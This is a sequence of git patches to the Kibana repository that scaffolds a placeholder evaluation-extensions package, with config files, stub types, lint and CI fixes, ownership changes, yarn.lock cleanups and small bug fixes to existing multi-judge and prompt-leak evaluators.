@@ -0,0 +1,6 @@
+{
+  "type": "shared-common",
+  "id": "@kbn/evals-extensions",
+  "owner": ["@elastic/kibana-obs-ai"],
+  "description": "Advanced evaluation capabilities for @kbn/evals - standalone extensions package. Home for features ported from cursor-plugin-evals and Phases 3-5 of evals roadmap."
+}
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/package.json b/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
new file mode 100644
index 0000000000000..5513f44c281e0
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
@@ -0,0 +1,22 @@
+{
+  "name": "@kbn/evals-extensions",
+  "version": "1.0.0",
+  "private": true,
+  "description": "Advanced evaluation capabilities - standalone extensions for @kbn/evals. Features ported from cursor-plugin-evals and home for Phases 3-5 of evals roadmap.",
+  "license": "Elastic License 2.0 OR AGPL-3.0-only OR SSPL-1.0",
+  "main": "./index.ts",
+  "scripts": {
+    "build": "echo 'No build required - types built by Kibana build system'",
+    "test": "jest"
+  },
+  "dependencies": {
+    "@kbn/evals": "link:../kbn-evals",
+    "@kbn/inference-common": "link:../../packages/private/kbn-inference-common",
+    "@kbn/scout": "link:../../../../../packages/kbn-scout",
+    "tslib": "^2.6.2"
+  },
+  "devDependencies": {
+    "@types/jest": "^29.5.5",
+    "jest": "^29.7.0"
+  }
+}
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts b/x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts
new file mode 100644
index 0000000000000..09f8915750984
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts
@@ -0,0 +1,14 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+/**
+ * Internal exports for @kbn/evals-extensions
+ * External API surface is defined in the root index.ts
+ */
+
+export * from './types';
+export * from './utils';
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/src/types/index.ts b/x-pack/platform/packages/shared/kbn-evals-extensions/src/types/index.ts
new file mode 100644
index 0000000000000..90cd9b0eea61b
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/src/types/index.ts
@@ -0,0 +1,47 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+/**
+ * Shared types for @kbn/evals-extensions
+ *
+ * NOTE: This package depends on @kbn/evals but @kbn/evals does NOT depend on this package.
+ * Keep types that need to be shared with core @kbn/evals in @kbn/evals itself.
+ *
+ * Types here are specific to extension features and will be populated as features are added.
+ */
+
+/**
+ * Placeholder type that keeps this module non-empty so the package builds.
+ * Will be replaced or extended as features are added in subsequent PRs.
+ */
+export interface ExtensionPlaceholder {
+  version: string;
+  description: string;
+}
+
+/**
+ * Future type exports (to be added in subsequent PRs):
+ *
+ * PR #2: Cost tracking types
+ * - export interface CostData { ... }
+ * - export interface HyperparameterConfig { ... }
+ * - export interface EnvironmentSnapshot { ... }
+ *
+ * PR #3: Dataset management types
+ * - export interface DatasetVersion { ... }
+ * - export interface ValidationSchema { ... }
+ *
+ * PR #4: Safety evaluator types
+ * - export interface ToxicityScore { ... }
+ * - export interface PiiDetectionResult { ... }
+ *
+ * PR #5: UI component types
+ * - export interface RunComparison { ... }
+ * - export interface ExampleExplorerProps { ... }
+ *
+ * And so on for PRs #6-10...
+ */
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/src/utils/index.ts b/x-pack/platform/packages/shared/kbn-evals-extensions/src/utils/index.ts
new file mode 100644
index 0000000000000..7bc3109dd9887
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/src/utils/index.ts
@@ -0,0 +1,19 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+/**
+ * Utility functions for @kbn/evals-extensions
+ *
+ * Will be populated in future PRs with:
+ * - Common helpers
+ * - Shared calculations
+ * - Type guards
+ * - Validation utilities
+ */
+
+// Placeholder export until real utilities are added in future PRs
+export const UTILS_VERSION = '1.0.0';
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json b/x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json
new file mode 100644
index 0000000000000..c02e93fa3aab6
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json
@@ -0,0 +1,27 @@
+{
+  "extends": "@kbn/tsconfig-base/tsconfig.json",
+  "compilerOptions": {
+    "outDir": "target/types",
+    "types": [
+      "jest",
+      "node",
+      "@kbn/ambient-common-types"
+    ]
+  },
+  "include": [
+    "**/*.ts",
+    "**/*.json"
+  ],
+  "exclude": [
+    "target/**/*"
+  ],
+  "kbn_references": [
+    "@kbn/evals",
+    "@kbn/inference-common",
+    "@kbn/scout",
+    "@kbn/dev-cli-runner",
+    "@kbn/tooling-log",
+    "@kbn/zod",
+    "@kbn/test"
+  ]
+}
diff --git a/yarn.lock b/yarn.lock
index 10353fa806595..61bd8494c4aae 100644
--- a/yarn.lock
+++ b/yarn.lock
@@ -6739,6 +6739,10 @@
   version "0.0.0"
   uid ""
 
+"@kbn/evals-extensions@link:x-pack/platform/packages/shared/kbn-evals-extensions":
+  version "0.0.0"
+  uid ""
+
 "@kbn/evals-phoenix-executor@link:x-pack/platform/packages/shared/kbn-evals-phoenix-executor":
   version "0.0.0"
   uid ""
@@ -7183,6 +7187,10 @@
   version "0.0.0"
   uid ""
 
+"@kbn/inference-common@link:x-pack/platform/packages/packages/private/kbn-inference-common":
+  version "0.0.0"
+  uid ""
+
 "@kbn/inference-common@link:x-pack/platform/packages/shared/ai-infra/inference-common":
   version "0.0.0"
   uid ""
@@ -8403,6 +8411,10 @@
   version "0.0.0"
   uid ""
 
+"@kbn/scout@link:packages/kbn-scout":
+  version "0.0.0"
+  uid ""
+
 "@kbn/scout@link:src/platform/packages/shared/kbn-scout":
   version "0.0.0"
   uid ""

From bf1e95cd6be1b21479fbd7bedd75ff562103b606 Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Fri, 20 Mar 2026 09:05:46 +0000
Subject: [PATCH 05/15] Changes from node scripts/lint_ts_projects --fix

---
 .../packages/shared/kbn-evals-extensions/tsconfig.json      | 6 ------
 1 file changed, 6 deletions(-)

diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json b/x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json
index c02e93fa3aab6..f2347e8ce78ed 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json
@@ -17,11 +17,5 @@
   ],
   "kbn_references": [
     "@kbn/evals",
-    "@kbn/inference-common",
-    "@kbn/scout",
-    "@kbn/dev-cli-runner",
-    "@kbn/tooling-log",
-    "@kbn/zod",
-    "@kbn/test"
   ]
 }

From 8467f10dc57a7cdba04848ecfeaa78612a4f5351 Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Fri, 20 Mar 2026 09:05:57 +0000
Subject: [PATCH 06/15] Changes from node scripts/lint_packages --fix

---
 .../platform/packages/shared/kbn-evals-extensions/package.json  | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/package.json b/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
index 5513f44c281e0..4274824638567 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
@@ -3,7 +3,7 @@
   "version": "1.0.0",
   "private": true,
   "description": "Advanced evaluation capabilities - standalone extensions for @kbn/evals. Features ported from cursor-plugin-evals and home for Phases 3-5 of evals roadmap.",
-  "license": "Elastic License 2.0 OR AGPL-3.0-only OR SSPL-1.0",
+  "license": "Elastic License 2.0",
   "main": "./index.ts",
   "scripts": {
     "build": "echo 'No build required - types built by Kibana build system'",

From 29401c3ea515f753db3ba2afe8c20face15202af Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Fri, 20 Mar 2026 09:18:27 +0000
Subject: [PATCH 07/15] Changes from node scripts/generate codeowners

---
 .github/CODEOWNERS | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS
index 25d013e6e8338..adc68fb839088 100644
--- a/.github/CODEOWNERS
+++ b/.github/CODEOWNERS
@@ -989,6 +989,7 @@ x-pack/platform/packages/shared/kbn-entities-schema @elastic/obs-entities
 x-pack/platform/packages/shared/kbn-es-snapshot-loader @elastic/obs-ai-team
 x-pack/platform/packages/shared/kbn-evals @elastic/obs-ai-team @elastic/security-generative-ai
 x-pack/platform/packages/shared/kbn-evals-common @elastic/obs-ai-team @elastic/security-generative-ai
+x-pack/platform/packages/shared/kbn-evals-extensions @elastic/kibana-obs-ai
 x-pack/platform/packages/shared/kbn-evals-phoenix-executor @elastic/obs-ai-team
 x-pack/platform/packages/shared/kbn-evals-suite-streams @elastic/obs-onboarding-team @elastic/obs-sig-events-team
 x-pack/platform/packages/shared/kbn-event-stacktrace @elastic/obs-presentation-team @elastic/obs-exploration-team
@@ -3256,4 +3257,3 @@ x-pack/solutions/observability/plugins/synthetics/server/saved_objects/synthetic
 ####
 ## These rules are always last so they take ultimate priority over everything else
 ####
-/x-pack/platform/packages/shared/kbn-evals-extensions/ @elastic/kibana-obs-ai

From 4e51bf5bdd07db6d46b020cd37d4823c70274e60 Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Fri, 20 Mar 2026 09:18:35 +0000
Subject: [PATCH 08/15] Changes from node scripts/regenerate_moon_projects.js
 --update

---
 .../shared/kbn-evals-extensions/moon.yml      | 56 +++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml

diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml b/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
new file mode 100644
index 0000000000000..b73e090886f1b
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
@@ -0,0 +1,56 @@
+# This file is generated by the @kbn/moon package. Any manual edits will be erased!
+#  To extend this, write your extensions/overrides to 'moon.extend.yml'
+#  then regenerate this file with: 'node scripts/regenerate_moon_projects.js --update --filter @kbn/evals-extensions'
+
+$schema: https://moonrepo.dev/schemas/project.json
+id: '@kbn/evals-extensions'
+layer: unknown
+owners:
+  defaultOwner: '@elastic/kibana-obs-ai'
+toolchains:
+  default: node
+  javascript:
+    rootPackageDependenciesOnly: false
+language: typescript
+project:
+  title: '@kbn/evals-extensions'
+  description: Moon project for @kbn/evals-extensions
+  channel: ''
+  owner: '@elastic/kibana-obs-ai'
+  sourceRoot: x-pack/platform/packages/shared/kbn-evals-extensions
+dependsOn:
+  - '@kbn/evals'
+tags:
+  - shared-common
+  - package
+  - prod
+  - group-undefined
+  - jest-unit-tests
+fileGroups:
+  src:
+    - '**/*.ts'
+    - '**/*.json'
+    - '!target/**/*'
+tasks:
+  jest:
+    command: node
+    args:
+      - '--no-experimental-require-module'
+      - $workspaceRoot/scripts/jest
+      - '--config'
+      - $projectRoot/jest.config.js
+    options:
+      runFromWorkspaceRoot: true
+    inputs:
+      - '@group(src)'
+  jestCI:
+    command: node
+    args:
+      - '--no-experimental-require-module'
+      - $workspaceRoot/scripts/jest
+      - '--config'
+      - $projectRoot/jest.config.js
+    options:
+      runFromWorkspaceRoot: true
+    inputs:
+      - '@group(src)'

From b459fdcc253af11efcc7b75c8f4dcbb7f7d8b197 Mon Sep 17 00:00:00 2001
From: Patryk Kopycinski <patryk.kopycinski@elastic.co>
Date: Wed, 25 Mar 2026 22:14:44 +0100
Subject: [PATCH 09/15] fix(evals): resolve CI failures in
 @kbn/evals-extensions

- Use `export type *` for type-only re-exports (consistent-type-exports)
- Remove redundant scripts/dependencies from package.json to fix jest
  CI reporter expecting --config arg
---
 .../shared/kbn-evals-extensions/package.json     | 16 +---------------
 .../shared/kbn-evals-extensions/src/index.ts     |  2 +-
 2 files changed, 2 insertions(+), 16 deletions(-)

diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/package.json b/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
index 4274824638567..830ebc4dcaef2 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
@@ -4,19 +4,5 @@
   "private": true,
   "description": "Advanced evaluation capabilities - standalone extensions for @kbn/evals. Features ported from cursor-plugin-evals and home for Phases 3-5 of evals roadmap.",
   "license": "Elastic License 2.0",
-  "main": "./index.ts",
-  "scripts": {
-    "build": "echo 'No build required - types built by Kibana build system'",
-    "test": "jest"
-  },
-  "dependencies": {
-    "@kbn/evals": "link:../kbn-evals",
-    "@kbn/inference-common": "link:../../packages/private/kbn-inference-common",
-    "@kbn/scout": "link:../../../../../packages/kbn-scout",
-    "tslib": "^2.6.2"
-  },
-  "devDependencies": {
-    "@types/jest": "^29.5.5",
-    "jest": "^29.7.0"
-  }
+  "main": "./index.ts"
 }
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts b/x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts
index 09f8915750984..e14da609f2e38 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts
@@ -10,5 +10,5 @@
  * External API surface is defined in the root index.ts
  */
 
-export * from './types';
+export type * from './types';
 export * from './utils';

From 4b030275bc47217bf41b17b3e9c56519255df94b Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Wed, 25 Mar 2026 21:21:56 +0000
Subject: [PATCH 10/15] Changes from node scripts/lint.js --fix

---
 yarn.lock | 8 --------
 1 file changed, 8 deletions(-)

diff --git a/yarn.lock b/yarn.lock
index 2495b9a654753..8c24d531706e8 100644
--- a/yarn.lock
+++ b/yarn.lock
@@ -7328,10 +7328,6 @@
   version "0.0.0"
   uid ""
 
-"@kbn/inference-common@link:x-pack/platform/packages/packages/private/kbn-inference-common":
-  version "0.0.0"
-  uid ""
-
 "@kbn/inference-common@link:x-pack/platform/packages/shared/ai-infra/inference-common":
   version "0.0.0"
   uid ""
@@ -8556,10 +8552,6 @@
   version "0.0.0"
   uid ""
 
-"@kbn/scout@link:packages/kbn-scout":
-  version "0.0.0"
-  uid ""
-
 "@kbn/scout@link:src/platform/packages/shared/kbn-scout":
   version "0.0.0"
   uid ""

From 016015817efb472327ef97a4796ccaced7261310 Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Wed, 25 Mar 2026 21:46:28 +0000
Subject: [PATCH 11/15] Changes from node scripts/regenerate_moon_projects.js
 --update

---
 x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml | 2 --
 1 file changed, 2 deletions(-)

diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml b/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
index b73e090886f1b..868ad286b50ad 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
@@ -9,8 +9,6 @@ owners:
   defaultOwner: '@elastic/kibana-obs-ai'
 toolchains:
   default: node
-  javascript:
-    rootPackageDependenciesOnly: false
 language: typescript
 project:
   title: '@kbn/evals-extensions'

From 9e096056da8ba05f1c3dbfe8c6b2dc212a86bc02 Mon Sep 17 00:00:00 2001
From: Patryk Kopycinski <patryk.kopycinski@elastic.co>
Date: Thu, 26 Mar 2026 22:26:43 +0100
Subject: [PATCH 12/15] fix(evals-extensions): fix jest matcher error in
 package importability test

.resolves.not.toThrow() expects a promise but received a function.
Replaced with a direct dynamic import assertion.
---
 .../shared/kbn-evals-extensions/__tests__/package.test.ts    | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts b/x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts
index 3415c9e23dc3a..3cad7400b2597 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts
@@ -18,9 +18,8 @@ describe('@kbn/evals-extensions', () => {
     });
 
     it('should be importable without errors', async () => {
-      await expect(async () => {
-        await import('..');
-      }).resolves.not.toThrow();
+      const mod = await import('..');
+      expect(mod).toBeDefined();
     });
   });
 

From 4840a8ea224c010997e82b16a4c602dc5ad2b7e5 Mon Sep 17 00:00:00 2001
From: Garrett Spong <garrett.spong@elastic.co>
Date: Thu, 26 Mar 2026 23:23:28 -0600
Subject: [PATCH 13/15] First pass review fixes

---
 .github/CODEOWNERS                            |  2 +-
 package.json                                  |  1 -
 .../shared/kbn-evals-extensions/kibana.jsonc  |  7 +--
 .../shared/kbn-evals-extensions/moon.yml      |  8 +--
 .../src/evaluators/multi_judge/index.ts       |  2 +-
 .../src/evaluators/security/index.ts          |  2 +
 yarn.lock                                     | 54 ++-----------------
 7 files changed, 17 insertions(+), 59 deletions(-)

diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS
index 58642dac8bee8..e96482c1009c4 100644
--- a/.github/CODEOWNERS
+++ b/.github/CODEOWNERS
@@ -996,7 +996,7 @@ x-pack/platform/packages/shared/kbn-entities-schema @elastic/core-analysis
 x-pack/platform/packages/shared/kbn-es-snapshot-loader @elastic/obs-ai-team
 x-pack/platform/packages/shared/kbn-evals @elastic/obs-ai-team @elastic/security-generative-ai
 x-pack/platform/packages/shared/kbn-evals-common @elastic/obs-ai-team @elastic/security-generative-ai
-x-pack/platform/packages/shared/kbn-evals-extensions @elastic/kibana-obs-ai
+x-pack/platform/packages/shared/kbn-evals-extensions @elastic/obs-ai-team @elastic/security-generative-ai
 x-pack/platform/packages/shared/kbn-evals-phoenix-executor @elastic/obs-ai-team
 x-pack/platform/packages/shared/kbn-evals-suite-streams @elastic/obs-onboarding-team @elastic/obs-sig-events-team
 x-pack/platform/packages/shared/kbn-event-stacktrace @elastic/obs-presentation-team @elastic/obs-exploration-team
diff --git a/package.json b/package.json
index 5448a18ada9b9..9f73cc43e0156 100644
--- a/package.json
+++ b/package.json
@@ -633,7 +633,6 @@
     "@kbn/eui-provider-dev-warning": "link:src/platform/test/plugin_functional/plugins/eui_provider_dev_warning",
     "@kbn/eval-kql": "link:src/platform/packages/shared/kbn-eval-kql",
     "@kbn/evals-common": "link:x-pack/platform/packages/shared/kbn-evals-common",
-    "@kbn/evals-extensions": "link:x-pack/platform/packages/shared/kbn-evals-extensions",
     "@kbn/evals-plugin": "link:x-pack/platform/plugins/shared/evals",
     "@kbn/event-annotation-common": "link:src/platform/packages/shared/kbn-event-annotation-common",
     "@kbn/event-annotation-components": "link:src/platform/packages/shared/kbn-event-annotation-components",
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc b/x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc
index 6f03786515b8d..fdea4cb3f5818 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc
@@ -1,6 +1,7 @@
 {
-  "type": "shared-common",
+  "type": "test-helper",
   "id": "@kbn/evals-extensions",
-  "owner": ["@elastic/kibana-obs-ai"],
-  "description": "Advanced evaluation capabilities for @kbn/evals - standalone extensions package. Home for features ported from cursor-plugin-evals and Phases 3-5 of evals roadmap."
+  "owner": ["@elastic/obs-ai-team", "@elastic/security-generative-ai"],
+  "description": "Advanced evaluation capabilities for @kbn/evals - standalone extensions package. Home for features ported from cursor-plugin-evals and Phases 3-5 of evals roadmap.",
+  "devOnly": true
 }
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml b/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
index 868ad286b50ad..f07149989f299 100644
--- a/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/moon.yml
@@ -6,7 +6,7 @@ $schema: https://moonrepo.dev/schemas/project.json
 id: '@kbn/evals-extensions'
 layer: unknown
 owners:
-  defaultOwner: '@elastic/kibana-obs-ai'
+  defaultOwner: '@elastic/obs-ai-team'
 toolchains:
   default: node
 language: typescript
@@ -14,14 +14,14 @@ project:
   title: '@kbn/evals-extensions'
   description: Moon project for @kbn/evals-extensions
   channel: ''
-  owner: '@elastic/kibana-obs-ai'
+  owner: '@elastic/obs-ai-team'
   sourceRoot: x-pack/platform/packages/shared/kbn-evals-extensions
 dependsOn:
   - '@kbn/evals'
 tags:
-  - shared-common
+  - test-helper
   - package
-  - prod
+  - dev
   - group-undefined
   - jest-unit-tests
 fileGroups:
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts
index bc96346e1b7be..875ea488b80b0 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts
@@ -60,7 +60,7 @@ export function createMultiJudgeEvaluator(config: {
       results.forEach((result, i) => {
         if (result.status === 'fulfilled') {
           judgeResults.push({ name: judges[i].name, result: result.value });
-          if (result.value.score != null) {
+          if (result.value.score != null && Number.isFinite(result.value.score)) {
             scores.push(result.value.score);
           }
         } else {
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts
index cd2e744ded102..f6f8081067551 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts
@@ -113,6 +113,7 @@ export function createPromptLeakDetectionEvaluator(config?: {
       const detectedPatterns: Array<{ pattern: string; location: 'text' | 'codeblock' }> = [];
 
       for (const pattern of patterns) {
+        pattern.lastIndex = 0;
         if (pattern.test(strippedPlainText)) {
           detectedPatterns.push({ pattern: pattern.source, location: 'text' });
         }
@@ -121,6 +122,7 @@ export function createPromptLeakDetectionEvaluator(config?: {
       for (const block of codeBlocks) {
         const strippedBlock = stripExcludedSegments(block);
         for (const pattern of patterns) {
+          pattern.lastIndex = 0;
           if (pattern.test(strippedBlock)) {
             detectedPatterns.push({ pattern: pattern.source, location: 'codeblock' });
           }
diff --git a/yarn.lock b/yarn.lock
index 4834031837a22..c92889f259ea6 100644
--- a/yarn.lock
+++ b/yarn.lock
@@ -2455,7 +2455,7 @@
   resolved "https://registry.yarnpkg.com/@elastic/filesaver/-/filesaver-1.1.2.tgz#1998ffb3cd89c9da4ec12a7793bfcae10e30c77a"
   integrity sha512-YZbSufYFBhAj+S2cJgiKALoxIJevqXN2MSr6Yqr42rJdaPuM31cj6pUDwflkql1oDjupqD9la+MfxPFjXI1JFQ==
 
-"@elastic/kibana-d3-color@npm:@elastic/kibana-d3-color@2.0.1":
+"@elastic/kibana-d3-color@npm:@elastic/kibana-d3-color@2.0.1", "d3-color@1 - 2", "d3-color@npm:@elastic/kibana-d3-color@2.0.1":
   version "2.0.1"
   resolved "https://registry.yarnpkg.com/@elastic/kibana-d3-color/-/kibana-d3-color-2.0.1.tgz#f83b9c2fea09273a918659de04d5e8098c82f65c"
   integrity sha512-YZ8hV2bWNyYi833Yj3UWczmTxdHzmo/Xc2IVkNXr/ZqtkrTDlTLysCyJm7SfAt9iBy6EVRGWTn8cPz8QOY6Ixw==
@@ -6827,10 +6827,6 @@
   version "0.0.0"
   uid ""
 
-"@kbn/evals-extensions@link:x-pack/platform/packages/shared/kbn-evals-extensions":
-  version "0.0.0"
-  uid ""
-
 "@kbn/evals-phoenix-executor@link:x-pack/platform/packages/shared/kbn-evals-phoenix-executor":
   version "0.0.0"
   uid ""
@@ -12078,7 +12074,7 @@
   resolved "https://registry.yarnpkg.com/@readme/openapi-schemas/-/openapi-schemas-3.1.0.tgz#5ff4b704af6a8b108f9d577fd87cf73e9e7b3178"
   integrity sha512-9FC/6ho8uFa8fV50+FPy/ngWN53jaUu4GRXlAjcxIRrzhltJnpKkBG2Tp0IDraFJeWrOpk84RJ9EMEEYzaI1Bw==
 
-"@redocly/ajv@^8.11.2", "@redocly/ajv@^8.18.0":
+"@redocly/ajv@^8.11.2", "@redocly/ajv@^8.18.0", "ajv@npm:@redocly/ajv@8.18.0":
   version "8.18.0"
   resolved "https://registry.yarnpkg.com/@redocly/ajv/-/ajv-8.18.0.tgz#e6c7ba549111838baa950bc31acbc84b06f0239f"
   integrity sha512-F+LMD2IDIXuHxgpLJh3nkLj9+tSaEzoUWd+7fONGq5pe2169FUDjpEkOfEpoGLz1sbZni/69p07OsecNfAOpqA==
@@ -16096,16 +16092,6 @@ ajv@^6.12.2, ajv@^6.12.4, ajv@^6.12.5:
     json-schema-traverse "^0.4.1"
     uri-js "^4.2.2"
 
-"ajv@npm:@redocly/ajv@8.18.0":
-  version "8.18.0"
-  resolved "https://registry.yarnpkg.com/@redocly/ajv/-/ajv-8.18.0.tgz#e6c7ba549111838baa950bc31acbc84b06f0239f"
-  integrity sha512-F+LMD2IDIXuHxgpLJh3nkLj9+tSaEzoUWd+7fONGq5pe2169FUDjpEkOfEpoGLz1sbZni/69p07OsecNfAOpqA==
-  dependencies:
-    fast-deep-equal "^3.1.3"
-    fast-uri "^3.0.1"
-    json-schema-traverse "^1.0.0"
-    require-from-string "^2.0.2"
-
 anser@^2.1.1:
   version "2.3.2"
   resolved "https://registry.yarnpkg.com/anser/-/anser-2.3.2.tgz#e2da9d10759a4243a5819595f4f46ec369970c5b"
@@ -19192,11 +19178,6 @@ d3-collection@^1.0.7:
   resolved "https://registry.yarnpkg.com/d3-collection/-/d3-collection-1.0.7.tgz#349bd2aa9977db071091c13144d5e4f16b5b310e"
   integrity sha512-ii0/r5f4sjKNTfh84Di+DpztYwqKhEyUlKoPrzUFfeSkWxjW49xU2QzO9qrPrNkpdI0XJkfzvmTu8V2Zylln6A==
 
-"d3-color@1 - 2", "d3-color@npm:@elastic/kibana-d3-color@2.0.1":
-  version "2.0.1"
-  resolved "https://registry.yarnpkg.com/@elastic/kibana-d3-color/-/kibana-d3-color-2.0.1.tgz#f83b9c2fea09273a918659de04d5e8098c82f65c"
-  integrity sha512-YZ8hV2bWNyYi833Yj3UWczmTxdHzmo/Xc2IVkNXr/ZqtkrTDlTLysCyJm7SfAt9iBy6EVRGWTn8cPz8QOY6Ixw==
-
 "d3-color@1 - 3", d3-color@^3.1.0:
   version "3.1.0"
   resolved "https://registry.yarnpkg.com/d3-color/-/d3-color-3.1.0.tgz#395b2833dfac71507f12ac2f7af23bf819de24e2"
@@ -32747,7 +32728,7 @@ string-length@^4.0.1:
     char-regex "^1.0.2"
     strip-ansi "^6.0.0"
 
-"string-width-cjs@npm:string-width@^4.2.0":
+"string-width-cjs@npm:string-width@^4.2.0", string-width@^4.1.0, string-width@^4.2.0, string-width@^4.2.3:
   version "4.2.3"
   resolved "https://registry.yarnpkg.com/string-width/-/string-width-4.2.3.tgz#269c7117d27b05ad2e536830a8ec895ef9c6d010"
   integrity sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==
@@ -32765,15 +32746,6 @@ string-width@^1.0.1:
     is-fullwidth-code-point "^1.0.0"
     strip-ansi "^3.0.0"
 
-string-width@^4.1.0, string-width@^4.2.0, string-width@^4.2.3:
-  version "4.2.3"
-  resolved "https://registry.yarnpkg.com/string-width/-/string-width-4.2.3.tgz#269c7117d27b05ad2e536830a8ec895ef9c6d010"
-  integrity sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==
-  dependencies:
-    emoji-regex "^8.0.0"
-    is-fullwidth-code-point "^3.0.0"
-    strip-ansi "^6.0.1"
-
 string-width@^5.0.1, string-width@^5.1.2:
   version "5.1.2"
   resolved "https://registry.yarnpkg.com/string-width/-/string-width-5.1.2.tgz#14f8daec6d81e7221d2a357e668cab73bdbca794"
@@ -32874,14 +32846,7 @@ stringify-object@^3.2.1:
     is-obj "^1.0.1"
     is-regexp "^1.0.0"
 
-"strip-ansi-cjs@npm:strip-ansi@^6.0.1":
-  version "6.0.1"
-  resolved "https://registry.yarnpkg.com/strip-ansi/-/strip-ansi-6.0.1.tgz#9e26c63d30f53443e9489495b2105d37b67a85d9"
-  integrity sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==
-  dependencies:
-    ansi-regex "^5.0.1"
-
-strip-ansi@6.0.1, strip-ansi@^6.0.0, strip-ansi@^6.0.1:
